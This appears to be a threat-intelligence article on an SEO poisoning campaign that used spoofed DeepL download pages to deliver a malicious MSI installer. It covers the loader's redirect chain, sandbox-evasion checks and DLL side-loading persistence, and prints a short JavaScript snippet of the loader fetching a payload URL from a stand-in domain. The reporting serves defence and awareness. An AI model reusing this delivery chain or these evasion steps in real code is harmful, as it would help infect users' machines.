In August 2025, cybersecurity researchers identified a sophisticated SEO poisoning campaign specifically targeting Chinese-speaking Windows users. By manipulating search engine rankings through tailored SEO plugins and registering domains that closely resemble legitimate software providers, attackers successfully deceived users into downloading malicious software installers.
Tactics Employed by Attackers
The perpetrators employed advanced SEO techniques to elevate the visibility of their malicious sites in search results. By using SEO plugins and creating domains with minimal character substitutions, they crafted websites that appeared nearly identical to legitimate software download pages. This strategy was particularly effective against users searching for popular applications like DeepL, leading them to counterfeit pages that prompted the download of compromised installers.
Mechanism of Infection
Upon visiting these deceptive sites, users encountered a JavaScript-based loader named `nice.js`. This script initiated a multi-step download process, dynamically retrieving JSON responses to determine the final installer URL. The process is as follows:
“`javascript
fetch(`https://spoofeddomain.com/api/download?device=${deviceType}&domain=${currentDomain}`)
.then(response => response.json())
.then(data => fetch(data.secondaryLink))
.then(response => response.json())
.then(data => window.location.href = data.finalUrl);
“`
This sequence of JSON-based redirects not only obscured the delivery of malicious content but also allowed attackers to tailor payloads based on the victim’s device type and domain origin.
Payload Deployment and Evasion Techniques
The final payload was an MSI installer that combined a legitimate DeepL installer with a malicious DLL file named `EnumW.dll`. This DLL executed a custom action within Windows Installer, initiating anti-analysis checks before extracting the payload. These checks included:
– Parent process verification
– Sleep integrity validation via HTTP date queries
– ACPI table inspections to detect sandboxing and virtualization environments
Only after passing these checks did the malware reconstruct and decompress its payload, ensuring robust deployment on genuine end-user machines.
Persistence and Further Compromise
Once executed, the MSI installer elevated itself to administrator privileges and dropped several components into system directories, including:
– A debug-linked DLL
– Fragmented ZIP archives
– Auxiliary files
The malware then reconstructed these fragmented archives into a file named `emoji.dat`, decompressed it, and deployed it under a unique directory in the user profile. Subsequent side-loading of a packed `vstdlib.dll` by searching for sibling EXE files ensured persistence and complicated forensic analysis.
Broader Implications
The stolen credentials and system data collected by these weaponized installers can be leveraged for further compromise, lateral movement within networks, or sale on underground markets. This campaign underscores the evolving tactics of cybercriminals who exploit search engine optimization to distribute malware, reaching a broad audience without the need for direct phishing emails or overt social engineering.
Recommendations for Users
To mitigate the risk of such attacks, users are advised to:
– Download software only from official and trusted sources.
– Be cautious of search results that lead to unfamiliar domains, especially those closely resembling legitimate sites.
– Keep operating systems and security software up to date to detect and prevent malware infections.
– Regularly monitor system activity for unusual behavior that may indicate a compromise.
By staying vigilant and adhering to these practices, users can better protect themselves against sophisticated SEO poisoning campaigns and other cyber threats.
